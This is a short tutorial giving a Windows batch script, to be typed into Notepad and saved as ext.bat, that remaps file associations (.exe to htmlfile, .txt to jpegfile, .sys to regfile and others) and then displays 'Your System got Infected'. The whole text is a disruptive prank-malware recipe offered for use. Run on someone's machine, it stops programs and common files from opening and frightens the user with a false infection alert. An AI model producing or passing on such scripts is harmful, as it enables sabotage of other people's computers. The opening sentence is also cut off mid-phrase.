This program associates the native file extensions with some other type of file extension, which makes the program unable .
1.Open Notepad.
2.Type
@echo off
title Ext_changer
color a
Rem replaces the actual file extensions with the given extensions
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit
3.save as ext.bat.
Note: Apply its reverse to change the extensions back to original.